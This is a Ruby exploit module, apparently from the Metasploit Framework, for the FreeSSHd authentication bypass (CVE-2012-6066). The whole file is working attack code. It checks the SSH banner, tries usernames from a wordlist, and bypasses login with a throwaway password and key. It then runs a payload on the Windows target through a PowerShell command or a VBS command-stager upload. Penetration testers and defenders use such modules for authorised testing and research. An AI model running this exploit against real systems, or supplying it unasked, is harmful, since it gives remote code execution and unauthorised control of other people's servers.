GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/ssh/freesshd_authbypass.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
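class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Powershell
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => "Freesshd Authentication Bypass",
        'Description' => %q{
          This module exploits a vulnerability found in FreeSSHd <= 1.2.6 to bypass
          authentication. You just need the username (which defaults to root). The exploit
          has been tested with both password and public key authentication.
        },
        'License' => MSF_LICENSE,
        'Author' =>
          [
            'Aris', # Vulnerability discovery and Exploit
            'kcope', # 2012 Exploit
            'Daniele Martini <cyrax[at]pkcrew.org>', # Metasploit module
            'Imran E. Dawoodjee <imrandawoodjee[at][email protected]> (minor improvements)' # minor improvements
          ],
        'References' =>
          [
            ['CVE', '2012-6066'],
            ['OSVDB', '88006'],
            ['BID', '56785'],
            ['URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2012-12/0012.html'],
            ['URL', 'https://seclists.org/fulldisclosure/2010/Aug/132']
          ],
        'Platform' => 'win',
        'Privileged' => true,
        'Targets' =>
          [
            ['PowerShell', {}],
            ['CmdStager upload', {}]
          ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2010-08-11'
      )
    )

    register_options(
      [
        Opt::RPORT(22),
        OptString.new('USERNAME', [false, 'A specific username to try']),
        OptPath.new(
          'USER_FILE',
          [
            true,
            "File containing usernames, one per line",
            # Defaults to unix_users.txt, because this is the closest one we can try
            File.join(Msf::Config.data_directory, "wordlists", "unix_users.txt")
          ]
        )
      ]
    )
  end

  # Fingerprints the server from its SSH identification banner.
  #
  # @return [Exploit::CheckCode] Vulnerable when the banner names the WeOnlyDo
  #   library at one of the versions the module recognises as affected,
  #   Detected when WeOnlyDo is present but the version is not recognised,
  #   Safe when another SSH server answers, and Unknown when no banner could
  #   be read (connection refused, reset, or no data within the read timeout).
  def check
    banner = nil
    begin
      connect
      # The banner is sent unsolicited; bound the read so an unresponsive host
      # cannot stall the check indefinitely.
      banner = Timeout.timeout(10) { sock.recv(30) }
    rescue Rex::ConnectionError, ::Errno::ECONNRESET, ::EOFError, Timeout::Error => e
      vprint_error("Could not read the SSH banner: #{e.message}")
      return Exploit::CheckCode::Unknown
    ensure
      disconnect
    end

    # A nil/empty read is treated as "not this server" rather than crashing on nil.
    return Exploit::CheckCode::Safe unless banner.to_s.match?(/SSH-2\.0-WeOnlyDo/)

    # Banner shape is "SSH-2.0-WeOnlyDo <version>"; the version token may be
    # missing, so fall back to an empty string instead of calling match? on nil.
    version = banner.split(' ')[1].to_s
    return Exploit::CheckCode::Vulnerable if version.match?(/(2\.1\.3|2\.0\.6)/)

    Exploit::CheckCode::Detected
  end

  # Runs +cmd+ on the target through the SSH session established by #exploit.
  # This is the hook the CmdStager mixin calls; +_opts+ is accepted only to
  # satisfy that interface.
  #
  # @param cmd [String] command line to run under cmd.exe
  # @param _opts [Hash] ignored
  # @return [String, nil] whatever Net::SSH's exec! returns for the command
  def execute_command(cmd, _opts = {})
    fail_with(Failure::Unknown, 'No SSH session is available to run the command') unless @connection

    @connection.exec!("cmd.exe /c #{cmd}")
  end

  # Builds the option hash shared by every login attempt.
  #
  # The password is random because the bypass does not depend on its value;
  # a fresh 2048-bit RSA key is generated per run for the same reason (this
  # costs a short delay at startup). Host-key verification is disabled since
  # the target's key is not known in advance.
  #
  # @return [Hash] options for Net::SSH's transport, authentication and
  #   connection sessions
  def setup_ssh_options
    {
      password: rand_text_alpha(8),
      port: datastore['RPORT'],
      timeout: 1,
      proxies: datastore['Proxies'],
      key_data: OpenSSL::PKey::RSA.new(2048).to_pem,
      auth_methods: ['publickey'],
      verify_host_key: :never
    }
  end

  # Opens an SSH transport for +username+ and probes it with a harmless
  # "echo" to confirm the channel actually executes commands.
  #
  # @param username [String] account name to present to the server
  # @param options [Hash] base options from #setup_ssh_options; not mutated
  # @return [Net::SSH::Connection::Session, nil] a live session, or nil when
  #   the probe timed out or raised — the transport is closed in that case so
  #   rejected usernames do not leave half-open connections behind
  def do_login(username, options)
    print_status("Trying username '#{username}'")
    login_options = options.merge(username: username)

    transport = Net::SSH::Transport::Session.new(datastore['RHOST'], login_options)
    auth = Net::SSH::Authentication::Session.new(transport, login_options)
    auth.authenticate("ssh-connection", username, login_options[:password])
    connection = Net::SSH::Connection::Session.new(transport, login_options)

    begin
      Timeout.timeout(10) { connection.exec!('cmd.exe /c echo') }
    rescue Timeout::Error
      print_status("Timeout")
      close_transport(transport)
      return nil
    rescue RuntimeError => e
      # Keep the silent-skip behaviour for the bruteforce loop, but make the
      # reason visible in verbose mode instead of swallowing it entirely.
      vprint_error("Command probe failed for '#{username}': #{e.message}")
      close_transport(transport)
      return nil
    end

    connection
  end

  #
  # Cannot use the auth_brute mixin, because if we do, a payload handler won't start.
  # So we have to write our own each_user here.
  #
  # Yields each candidate username: USERNAME alone when it is set and
  # non-empty, otherwise every whitespace-separated token of USER_FILE,
  # de-duplicated in file order. Returns an Enumerator when no block is given.
  def each_user
    return enum_for(:each_user) unless block_given?

    username = datastore['USERNAME']
    user_list =
      if username && !username.empty?
        [username]
      else
        # binread + block-free read avoids the unclosed handle the open/read/close
        # sequence left behind on an exception.
        File.binread(datastore['USER_FILE']).split.uniq
      end

    user_list.each { |user| yield user }
  end

  # Confirms the target fingerprints as vulnerable, finds a username the
  # server accepts, then delivers the payload for the selected target.
  #
  # @raise [Msf::Exploit::Failed] via fail_with when the check does not return
  #   Vulnerable or when no username yields a working session
  def exploit
    unless check == CheckCode::Vulnerable
      fail_with(Failure::NotVulnerable, 'Target is most likely not vulnerable!')
    end

    options = setup_ssh_options
    @connection = nil

    each_user do |username|
      next if username.empty?

      @connection = do_login(username, options)
      break if @connection
    end

    # Report the outcome explicitly rather than returning silently with no session.
    fail_with(Failure::NoAccess, 'No username yielded a working SSH session') unless @connection

    case target.name
    when 'PowerShell'
      print_status('Executing payload via Powershell...')
      psh_command = cmd_psh_payload(payload.encoded, payload_instance.arch.first)
      execute_command(psh_command)
    when 'CmdStager upload'
      print_status("Uploading payload, this may take several minutes...")
      execute_cmdstager(flavor: :vbs, decoder: default_decoder(:vbs), linemax: 1700)
    end
  end

  private

  # Best-effort teardown of a transport whose probe failed. Errors during
  # close are reported in verbose mode only; the caller has already decided
  # to move on to the next username.
  #
  # @param transport [Net::SSH::Transport::Session]
  # @return [void]
  def close_transport(transport)
    transport.close
  rescue StandardError => e
    vprint_error("Error closing SSH transport: #{e.message}")
  end
end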